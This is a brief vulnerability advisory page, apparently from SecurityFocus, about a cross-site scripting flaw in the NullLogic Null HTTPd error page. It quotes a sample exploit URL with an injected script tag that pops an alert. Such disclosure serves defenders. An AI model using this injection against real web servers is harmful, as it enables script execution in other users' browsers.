info
discussion
exploit
solution
references
NullLogic Null HTTPd Error Page Cross-Site Scripting Vulnerability
A sample exploit URL has been supplied by Matthew Murphy <mattmurphy@kc.rr.com>:
http://localhost/a?x=<SCRIPT>alert(document.URL)</SCRIPT>
Privacy Statement
Copyright 2010, SecurityFocus
